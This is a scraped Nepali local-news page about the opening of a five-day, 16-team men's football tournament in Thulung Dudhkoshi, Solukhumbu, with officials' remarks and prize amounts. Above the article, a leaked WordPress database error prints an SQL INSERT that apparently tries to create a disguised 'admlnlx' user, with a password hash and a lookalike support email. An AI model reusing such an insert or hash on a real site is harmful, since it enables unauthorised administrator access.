WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk.vA0fU0aCDRsxBEn5WBYaNxzE52W0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:09:30', '', 'admlnlx', 'admlnlx')

थूलुङ दुदकोशिमा खुल्ला पुरुष फुटबल प्रतियोगिता सुरु – Gaule Khabar

थूलुङ दुदकोशिमा खुल्ला पुरुष फुटबल प्रतियोगिता सुरु

थूलुङ दुदकोशिमा खुल्ला पुरुष फुटबल प्रतियोगिता सुरु
फोटो सामाजिक सन्जालबाट

सोलुखुम्बु । खेल खेलौ स्वस्थ रहौ, आफ्नो गाउँ युवा मिलि आफै बनाऔं, भन्ने मुल नाराका साथ दुधकोशी युवा क्लबको आयोजनामा संचालित खुल्ला पुरुष फुटबल प्रतियोगिता एवम सास्कृतिक कार्यक्रमको उद्घाटन सम्पन्न भएको छ ।

थूलुङ दुदकोशी गाउँपालिका वडा नं ४ जुबुस्थित जनकल्याण माध्यमिक विद्यालयको प्रांगनमा आयोजित ५ दिने फुटबल प्रतियोगिता कार्यक्रमको उद्घाटन समारोहलाई सम्बोधन गर्दै थुलुङ दुधकोशी गाउँपालिका अध्यक्ष अशिम राईले हरेक क्षेत्रको विकासमा प्रतिवद्ध रहेको बताएका छन् । अध्यक्ष थुलुङले दिगो विकासका लागि जग हाल्ने काम गरिरहेको बताए ।

स्वास्थ्य, शिक्षा लगायतका क्षेत्रलाई विशेष प्राथमिकता दिई अगाडी बढाउँदै उनले दुधकाशी सामुदायिक अस्पतालको ९० प्रतिशत काम सम्पन्न भएको र बुह प्राविधिक शिक्षालय स्थापना गरेको बताए । खेलकुदको माध्यमबाट गाउँपालिकालाई समृद्ध बनाउने उनको भनाई छ । सोही कार्यक्रममा बोल्दै सभाषद गोपाल गिरीले खेलकुदको विकासबाट मुलुकलाई विश्वसामु चिनाउन सकिने बताए । उनले खेलाडीहरुको खेल क्षमतालाई कसैले पनि कुण्ठित बनाउन नसक्ने समेत बताए ।

उक्त प्रतियोगितामा १६ टिमको सहभागिता रहेको छ । खेलमा प्रथम, द्धितिय, तृतिय र सान्त्वना हुने टिमलाई क्रमश १ लाख १ हजार १ सय ११, ७५ हजार १ सय ११, ३५ हजार १ सय ११ र १० हजारको साथमा सिल्ड, मेडल र प्रमाणपत्र प्रदान गरिनेछ ।

कार्यक्रममा गाउँपालिकाकी उपाध्यक्ष सविता राई, विभिन्न वडाका वडाअध्यक्षहरु, समाजसेवी बलराम गुरुङ बुद्दिजिवी र खेलप्रेमिको बाक्लो उपस्थिती रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका